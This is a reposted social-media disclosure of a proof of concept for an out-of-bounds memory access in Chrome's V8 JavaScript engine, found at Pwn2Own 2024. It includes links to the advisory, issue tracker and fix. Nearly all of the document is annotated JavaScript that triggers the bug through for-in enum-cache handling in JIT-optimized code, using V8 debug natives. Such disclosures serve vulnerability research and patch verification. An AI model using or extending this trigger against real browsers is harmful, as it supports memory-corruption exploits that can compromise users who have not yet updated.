author: @buptsb
2024-04-03 16:06:14
https://x.com/buptsb/status/1775434620554850693
This PoC is the FIRST public disclosure for this vulnerability.
Info
Out of bounds memory access in V8. Reported by Edouard Bochin (@le_douds) and Tao Yan (@ga1ois) of Palo Alto Networks, via Pwn2Own 2024 on 2024-03-22
“earning $42,500 and 9 Master of Pwn points” https://twitter.com/thezdi/status/1770927914831274115
https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html
https://issues.chromium.org/issues/330760873
https://chromium-review.googlesource.com/c/v8/v8/+/5388435
Related to CVE-2023-4427, an out-of-bounds access on the enum cache indices array.
PoC
// Build three objects whose properties are added in the same order
// (a, then b, then c); object3 additionally receives "d" through
// Object.defineProperty as a non-writable but enumerable property.
const object1 = {};
object1.a = 1;
const object2 = {};
object2.a = 1;
object2.b = 1;
const object3 = {};
object3.a = 1;
object3.b = 1;
object3.c = 1;
Object.defineProperty(object3, "d", {writable: false, enumerable: true, value: 1});
// create a split branch in map transition tree
// object4 reaches "d" by plain assignment (writable), whereas object3's "d"
// is non-writable; the author's comment above says this is what makes the
// two objects diverge after a/b/c.
const object4 = {};
object4.a = 1;
object4.b = 1;
object4.c = 1;
object4.d = 1;
// Empty for-in over object3: enumerates its keys with no loop body.
// NOTE(review): presumably this populates V8's enum cache for object3's
// current shape before "d" is removed — confirm against the bug report.
for (let key in object3) { }
// Remove the non-writable property again after it has been enumerated once.
delete object3.d;
// Sink for the value read inside trigger(); assigned from its for-in loop.
let escape;
/**
 * Enumerates object2 with for-in. On every key it first runs `callback`
 * and then performs a keyed read `object2[key]`, storing the result in the
 * module-level `escape`. Because the callback runs between key enumeration
 * and the keyed read, anything it changes on other objects happens while
 * this loop is mid-enumeration.
 * @param {Function} callback - invoked once per enumerated key, with no arguments
 */
function trigger(callback) {
for (let key in object2) {
callback();
escape = object2[key];
}
}
// The %-prefixed calls are V8 runtime natives; they are not valid JavaScript
// in a standard engine and only parse under d8 (or V8 run with
// --allow-natives-syntax), so this block is a SyntaxError elsewhere.
%PrepareFunctionForOptimization(trigger);
// Two warm-up calls with a no-op callback let trigger() collect feedback.
trigger(_ => _);
trigger(_ => _);
// Ask V8 to run its optimized (JIT) version of trigger() on the next call.
%OptimizeFunctionOnNextCall(trigger);
// Third call, now optimized: the callback stores a double into object4.c
// (previously the integer 1, set above) and runs an empty for-in over
// object1 while trigger() is in the middle of enumerating object2.
// NOTE(review): presumably this mid-loop state change is what the optimized
// for-in did not account for (see the linked fix CL) — confirm against the
// issue tracker entry above.
trigger(_ => {
object4.c = 1.1;
for (let key in object1) { }
});
// %SystemBreak();